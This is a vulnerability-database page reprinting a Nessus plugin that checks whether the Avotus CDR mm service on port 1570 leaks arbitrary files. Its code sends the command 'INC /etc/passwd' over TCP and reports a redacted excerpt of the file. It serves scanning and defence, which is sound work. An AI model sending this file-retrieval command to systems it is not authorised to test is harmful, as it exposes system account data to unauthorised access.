Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Avotus CDR mm Arbitrary File Retrieval

🗓️ 11 Dec 2003 00:00:00Reported by TenableType 
nessus
 nessus🔗 www.tenable.com👁 22 Views

Avotus CDR mm service may allow unauthorized file retrieval of sensitive data like /etc/passwd.

Code
#
# See the Nessus Scripts License for details
#

#---------------------------------------------------------------------------
# This plugin has not been verified - meaning that there MIGHT be no
# flaw in the mentionned product.

# Changes by Tenable:
# - Revised plugin title, output formatting (9/4/09)
# - changed family (9/6/09)

include('compat.inc');

if (description)
{
  script_id(11948);
  script_version("1.17");
  script_set_attribute(attribute:"plugin_modification_date", value:"2025/04/02");

  script_name(english:"Avotus CDR mm Arbitrary File Retrieval");

  script_set_attribute(attribute:"synopsis", value:
"Arbitrary files may be read on the remote host.");
  script_set_attribute(attribute:"description", value:
"The script attempts to force the remote Avotus CDR mm service to include 
the file /etc/passwd accross the network.");
  script_set_attribute(attribute:"solution", value:
"The vendor has provided a fix for this issue to all customers. 
The fix will be included in future shipments and future versions of the 
product.
If an Avotus customer has any questions about this problem, they should 
contact [email protected].");
  script_set_attribute(attribute:"risk_factor", value:"High");

  script_set_attribute(attribute:"vuln_publication_date", value:"2003/12/11");
  script_set_attribute(attribute:"plugin_publication_date", value:"2003/12/11");

  script_set_attribute(attribute:"plugin_type", value:"remote");
  script_end_attributes();

  script_category(ACT_GATHER_INFO);
  script_family(english:"Misc.");

  script_copyright(english:"(C) 2003-2025 Anonymous");

  script_dependencies("find_service1.nasl");
  script_require_ports(1570, "Services/avotus_mm");

  exit(0);
}

#
# The script code starts here
#

include("misc_func.inc");
include("data_protection.inc");

cmd = string("INC /etc/passwd\n");


port = get_kb_item("Services/avotus_mm");
if(!port)port = 1570;
if(get_port_state(port))
{
 soc = open_sock_tcp(port);
 if(soc)
 {
  send(socket:soc, data:cmd);
  res = recv(socket:soc, length:65535);
  if(egrep(pattern:"root:.*:0:[01]:", string:res))
   {
    res = data_protection::redact_etc_passwd(output:res);
    report =  "
Here is an excerpt from the remote /etc/passwd file : 
" + res + '\n';
   security_hole(port:port, extra:report);
   }
  close(soc);
  }
}

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
02 Apr 2025 00:00Current
5.5Medium risk
Vulners AI Score5.5
arbitrary file retrievalavotus cdr mmsecurity vulnerabilityunauthorized accesshigh risk.
22